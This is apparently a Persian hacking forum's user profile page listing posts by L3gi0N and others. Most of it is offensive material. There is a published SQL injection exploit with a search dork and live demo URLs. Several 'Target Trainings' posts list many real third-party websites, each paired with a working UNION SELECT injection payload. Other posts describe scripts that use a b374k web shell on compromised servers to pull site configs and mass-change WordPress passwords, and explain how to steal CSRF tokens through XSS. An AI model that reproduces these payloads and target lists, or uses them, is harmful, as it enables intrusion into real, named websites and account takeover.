با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
61 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1
آخرین بار برد L3gi0N در آذر 12 2020
L3gi0N یکی از رکورد داران بیشترین تعداد پسند مطالب است !
اعتبار در سایت
3 Neutralدرباره L3gi0N
- تاریخ تولد ۰۰/۱۰/۲۰
Converted
-
Name
L3gi0N
-
Main os
Linux
-
Programming language
خیر
آخرین بازدید کنندگان نمایه
بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.
-
-
مشکل در نفوذ به سایت با باگ xss
dead_silyutls پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ( Cross Site Scripting ( Xss
فکر میکنم منظورتون توکن CSRF باشه. تو کد جاواسکریپتی که تزریق میکنید میتونید با استفاده از تابع fetch کاری کنید که وقتی کد روی مرورگر تارگت اجرا میشه صفحه ای که اون توکن توش هست رو فراخوانی کنه و توکن رو استخراج کنه برای استفاده. چند سال پیش که Wordpress یه باگ XSS داشت با این تکنیک wp_nonce رو استخراج میکردن و ازش برای جعل درخواست استفاده میکردن.- 3 پاسخ
-
- 2
-
-
L3gi0N شروع به دنبال کردن آموزش گرفتن دسترسی ادمین با باگ Xss در Wordpress، برای اینکه به هدفم برسم کمک میخام !، Datascan Information Technology Sql Injection Vulnerability و و 3 کاربر دیگر کرد
-
برای اینکه به هدفم برسم کمک میخام !
# Z # پاسخی برای موضوع ارسال کرد برای یک L3gi0N در امنیت سیستم های شخصی
هک یه زمینه خیلی گسترده ایه. رمزنگاری, امنیت وب, امنیت شبکه و ... ولی خلاصش اینه: یه هکر خوب یه برنامه نویس خلاقه. برای مثال باگ SQLi رو در نظر بگیر: یه نفر میره یه جایی میخونه که اگه آخر یه آدرسی مثل http://site.com/item.php?id=10 علامت ' رو بزاری و یه ارور خاصی رو بهت بده اگر طبق یه سری مراحل خاصی پیش بری میتونی هکش کنی. این یه نفر میره همین کارارو انجام میده میزنه یه سایتی رو هم هک میکنه بدون این که بدونه اصلا چرا ' باعث میشه که اون ارور رو ببینه یا اون مراحل خاصی که طبقشون پیش میره دقیقا چیکار میکنن. یکی دیگه هم کسیه که این روش به ذهنش رسیده وقتی که دیده اگر دستوری که به دیتابیس فرستاده میشه SELECT * FROM items WHERE id='<INPUT>' باشه (منظور از INPUT ورودی کاربره) و روی INPUT هیچ فیلتری اعمال نشه میتونه با گذاشتن یه ' توی ورودیش از بین اون ' ها (هرچیزی که بین دوتا ' باشه به عنوان یه متن پردازش میشه و به عنوان دستور اجرا نمیشه) به اصطلاح فرار کنه و یه سری کد به دستوری که به دیتابیس میره اضافه کنه و باعث لو رفتن اطلاعات بشه. اگر منظورت از هکر شدن تبدیل شدن به یکی مثل اونیه که اول گفتم کلا بیخیال شو. ولی اگه واقعا میخوای درست حسابی یاد بگیری و با پایه و اساس پیش بری برنامه نویسی یاد بگیر, خلاق باش و همیشه اخبار مربوط به هک و امنیت رو دنبال کن. اگرم به چیزی برخورد کردی که نفهمیدی تحقیق کن. تحقیق کردن خیلی مهمه. اگر با تحقیق به جایی نرسیدی بعدش برو از بقیه سوال کن. برای زبان برنامه نویسی هم فرقی نمیکنه چی یاد میگیری هرچی بیشتر یاد بگیری هم بهتر. ولی برای شروع کار بهت پیشنهاد میکنم بری دنبال زبونایی که تو محیطی که میخوای توش بیشترین فعالیت رو کنی استفاده میشن. -
سلام توی حلقه for بین دوتا متغیر باید از , به جای ; استفاده کنید و همچنین main باید int باشه نه void #include "stdafx.h" #include <conio.h> #include <iostream> using namespace std; int main() { float n,i,s=0,g; //clrscr(); cout << "Enter a number: "; cin >> n ; for (i=1,g=1;i<=n;i++,g*=-1) s += 1 / i*g; cout << s; cin.get(); cin.get(); return 0; }
-
Icsg Config Downloader & Wp Password Changer
یک موضوع پاسخی ارسال کرد برای L3gi0N در برنامه های نوشته شده توسط گروه
دوتا اسکریپت هست یکی با اسم backup.pl و یکی دیپه با اسم cng.pl به اولی ادرس فولدری که کانفیگ های سرور روش هست رو میدید به همراه ادرس یک شل b374k از سرور و یک فولدر توی pc خودتون بعد اسکریپت کار خودشو شروع میکنه و کانفیگ هارو براتون توی فولدر مشخص شده به صورت اسم [email protected] دانلود میکنه website ادرس سایتی هست که کانفیگ مربوط به اونه و username هم یوزر صاحب سایت در سرور. به دومی هم ادرس یک شل b374k از سرور مورد نظر به همراه ادرس فولدری که کانفیگ هارو توی pc خودتون دانلود کردید میدید بعد هم یک username و password بهش میدید و شروع میکنه به تغییر دادن username و password سایت های وردپرسی که کانفیگ هاشون رو دارید. download prog.zip -
Datascan Information Technology Sql Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای L3gi0N در آسیب پذیری های کشف و گزارش شده
https://cxsecurity.com/issue/WLB-2016040012 Datascan Information Technology SQL Injection Vulnerability Published Credit Risk 2016.04.01 Iran Cyber Security Group Medium CWE CVE Local Remote CWE-89 N/A No Yes Dork: intext:"Powered By Datascan Information Technology" ##################################################### # Exploit Title: Datascan Information Technology SQL Injection Vulnerability # Date: 2016-4-1 # Exploit Author: Iran Cyber Security Group # Discovered By: L3gi0N # Category : Web Application Bugs # Dork : intext:"Powered By Datascan Information Technology" # Home: iran-cyber.net ##################################################### # Vulnerable file: page_details.php # http://localhost:8080/page_details.php?menu_id=[sql Injection] ##################################################### # Demo: # http://biharmarwari.com/online/page_details.php?menu_id=13'+order+by+11+--+ # http://www.onlinercsm.in/mission_india/page_details.php?menu_id=13'+order+by+11+--+ # http://marwarishiksha.com/page_details.php?menu_id=13%27+order+by+17+--+ ##################################################### # iran-cyber.net # Tnx to: MOHAMAD-NOFOZI - root3r - sir.h4m1d - MoHaMaD-BlAcK - Mr.Turk - 0xDevil - 0x3a # MR.S4JJ4D ... 0day ... pi.hack ... Nazanin Wild ##################################################### -
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.nuomega.com/displaynews.php?id=-8+union+select+1,2,3,version%28%29,5,6,7 http://www.windsorspitfires2.com/tour_of_champions/news.php?id=-5+union+select+1,2,version%28%29,4,5 http://www.kitayproductions.com/news.php?id=-60%27+union+select+1,2,3,4,5,6,7,version%28%29,9+--+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.everybodywinsdc.org/news.php?id=-251+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16 http://www.pfedance.com/view_news.php?id=1+union+select+1,2,version%28%29,4,5,6,7,8 http://www.nspharmacists.org/news.php?id=-67%27+union+select+1,2,3,version%28%29,5+--+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.azura.co.za/product.php?id=-164+union+select+1,2,version%28%29,4,5,6,7 www.organicindia.com/overview_news.php?id=-88+union+select+1,version(),3,4,5,6,7 http://www.davisyoung.com/law-firm/news.php?id=-41%27+union+select+1,2,3,4,5,version%28%29,7,8,9+--+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.dvcanada.com/feature_product.php?id=-1113%20union%20select%201,version%28%29,3,4+--+ http://www.matthewschommer.com/gallery.php?id=-3%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12+--+ http://www.exclusivelyauctions.com/gallery.php?id=-97%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+--+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
اسکریپت رو روی هاست سایتتون اپلود کنید و اسکن کنید بعد از اسکن حتما پاکش کنید اسکریپتش چنتا باگ امنیتی داره
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.greenshop.org.tw/show_news.php?newsid=-376%27+union+select+1,version(),3,4,5+--+ http://www.drivingevent.com/show_news.php?NewsID=-204+union+select+1,2,version(),4 http://www.sanyourelay.ca/public/show_news.php?newsid=-1+union+select+1,version() http://culture.nipponclub.org/show_news.php?newsid=-227+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Target Trainings
Ara MarMolak پاسخی برای موضوع ارسال کرد برای یک L3gi0N در ابزارهای امنیتی و آنالیز سیستم ها
http://www.vitacaremedical.com/product.php?id_category=18&id_subcategory=-51+/*!12345UnIOn*/+/*!12345SeLect*/+1,2,3,4,5,6,version%28%29,8,9,10,11+--+ http://www.premierbuildingny.com/gallery.php?id=-2+union+select+version%28%29+--+ http://www.micro-mechanics.com/product.php?id=-25%20/*!12345union*/%20/*!12345select*/%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16+--+ http://www.schwinncyclery.com/brands/product.php?id=-59%27%20union%20select%201,2,3,4,version%28%29,6,7,8+--+- 1,520 پاسخ
-
- target
- target traning
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
آموزش های پیدا کردن باگ در سورس های Php
L3gi0N پاسخی برای موضوع ارسال کرد برای یک L3gi0N در تحلیل و بررسی آسیب پذیری های سایت و سرورها
قسمت سوم: خیلی از دوستان که برنامه نویسی PHP رو تازه شروع کردن نمیدونن که باگ ها چجوری و کجا به وجود میاد و وقتی طبق آموزش های قسمت های قبل پیش میرن فقط میفهمن که چه متغیر هایی قابل استفاده برای نفوذ هستن (فیلتر نمیشن) ولی نمیدونن که ایا اون متغیر ها درجایی که بشه ازش سو استفاده کرد به کار میرن یا نه و نمیدونن که چه بخش هایی قابل سو استفاده هستن. طبق تجربه ای که من داشتم شما هر آموزش باگ گیری رو نگاه کنید اومدن و چنتا function گذاشتن بغل هم و با یه کد و مثال خیلی ساده گفتن اگه اینجوری بود باگ داره و .... اما فقط این فانکشن ها اسیب پذیر نیستن در واقع باگ های اساسی در سه زمان پیش میاد: زمانی که از یک زبان داریم با یک سیستم یا زبانی که به زبان اصلی ربط نداره ارتباط برقرار میکنیم نمونه ی بارزش باگ sql injection هست که در واقع ما داریم با یک سیستم کاملا جدا که mysql هست و زبان اسکریپتینگ خودش (sql) رو داره ارتباط برقرار میکنیم. نمونه های دیگه: RCE - XSS زمانی که با فایل های دیگه سر و کار داره یا یک فانکشنی رو طبق درخواست اجرا میکنه. (هر زمانی که ما بتونیم فایلی که باهاش ارتباط برقرار میشه یا فانکشنی که اجرا میشه رو انتخاب کنیم و یا هنگام اپلود فایل هیچ بررسی روش انجام نشه احتمال وجود باگ هست) نمونه بارزش باگ LFD هست. نمونه های دیگه: Object Injection - RFI - RFU زمانی که هیچ کاری برای اطمینان از هویت افراد انجام نمیشه یا از درخواست های افراد اطمینان حاصل نمیشه نمونه بارزش باگ CSRF هست. بهتون پیشنهاد میکنم همیشه یک لیست از function های اسیب پذیر PHP داشته باشید ممکنه کمکتون کنه. مثل فانکشن unserialize که اگر بتونید محتویاتش رو کنترل کنید میتونید از حملات Object Injection استفاده کنید. (این مشکل فقط روی ورژن های قدیمی PHP موجوده) -
آموزش های پیدا کردن باگ در سورس های Php
L3gi0N پاسخی برای موضوع ارسال کرد برای یک L3gi0N در تحلیل و بررسی آسیب پذیری های سایت و سرورها
قسمت دوم: بعد از اینکه کار های قسمت قبلی رو انجام دادیم باید فایل هایی که اسمشون توی فایل inject.txt هست رو مورد بررسی قرار بدیم و دنبال متغیر هایی باشیم که ورودی کاربر رو دریافت می کنن بعد از اینکه اونهارو پیدا کردیم باید ببینیم که اونها چه تغییراتی روشون اعمال میشه (اگر تغییری روشون اعمال نشه که چه بهتر) و با درنظر داشتن اون تغییرات ببینیم که این متغیر ها کجا مورد استفاده قرار میگیرن اگر دیدید که توسط یک function یا class مورد استفاده قرار میگیرن و کد اونها درون این فایل نیست میتونید برنامه ی اموزش قبلی رو باز کنید و تیک Search codes رو بزنید بعد ادرس فولدری که فایل ها توشون قرار دارن رو بدید بهش و در کادری که جلوش نوشته Query میتونید اون function یا class رو جست و جو کنید و برنامه بعد از اسکن فایل ها اونهایی که متنی که به عنوان Query بهش دادید داشتن رو توی فایلی تو فولدر scan و با اسم result.txt میزاره و براتون بازش میکنه برای مثال اگر اسم function موردنظر test بود میتونیم با جست و جوی متن function test فایلی که کدهای اون function توش قرار دارن رو پیدا کنیم. اگر با وجود تغییر هایی که روی متغیرهایی که ورودی کاربر رو دریافت می کنن اعمال میشه باز هم بشه از اونها سو استفاده کرد میتونیم اون رو روی نسخه ای که در WAMP یا LAMP نصب کردیم تست کنیم. برای مثال کد زیر رو در نظر بگیرید: <?php $username = $_GET['user']; str_replace("(","",$username); $sqlquery = "SELECT * FROM users WHERE user='$username'"; mysql_query($sqlquery); ?> کد بالا پرانتز باز رو از ورودی کاربر حذف میکنه اما میبینید که بدون فیلتر کردنش برای جلوگیری از sql injection ازش تو mysql استفاده کرده پس به راحتی میتونیم حملات sql injection انجام بدیم و فیلتر کردن پرانتز باز عملا برای جلوگیری از sql injection بی استفادس و فقط یکم کار رو وقت گیر تر میکنه. اگر با تست روی WAMP یا LAMP موفق شدیم که خب یک باگ از اون cms یا plugin کشف کردیم اگر هم نه میتونیم با رجوع به کد ها مشکلات رو پیگیری کنیم و با اصلاح روش موفق بشیم اگر هم نشد میتونیم دنبال بقیه متغیر ها بریم. -
آموزش های پیدا کردن باگ در سورس های Php
L3gi0N پاسخی برای موضوع ارسال کرد برای یک L3gi0N در تحلیل و بررسی آسیب پذیری های سایت و سرورها
قسمت اول: اول از همه باید cms یا plugin رو که میخوایم ازش باگ بگیریم رو داشته باشیم بعد هم یک نسخه ازش رو روی LAMP برای Linux و یا WAMP برای Windows نصب کنیم. بعد هم یک نسخه ازش رو برای فیلتر کردن فایل های PHP توی یک فولدر دیگه بریزیم خب حالا با استفاده از برنامه ای که در اخر همین پست موجوده پوشه ای که فایل هارو توش ریختیم رو با کلیک بر روی دکمه Browse انتخاب میکنیم و بر روی Start Scanning می زنیم تا تمامی فایل هایی که به درد نیمخورن و PHP نیستن رو پاک کنه. بعد از اتمام اسکن این برنامه فایل هایی که با input های کاربر سر و کار دارن یا با دیتابیس ارتباط برقرار میکنن یا کامند اجرا می کنن رو شناسایی می کنه و ادرسشون رو توی فایل هایی با اسم های: inject.txt (فایل هایی که با input های کاربر سر و کار دارن) exec.txt (فایل هایی که کامند اجرا می کنن) sql.txt (فایل هایی که با دیتابیس ارتباط برقرار میکنن) توی فولدری با اسم scan ذخیره میکنه. طریقه استفاده از محتویات این فایل ها و برنامه ی قرار داده شده برای پیدا کردن باگ رو به صورت کامل در قسمت دوم توضیح میدم. I.C.S.G Exploiting Helper.zip
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.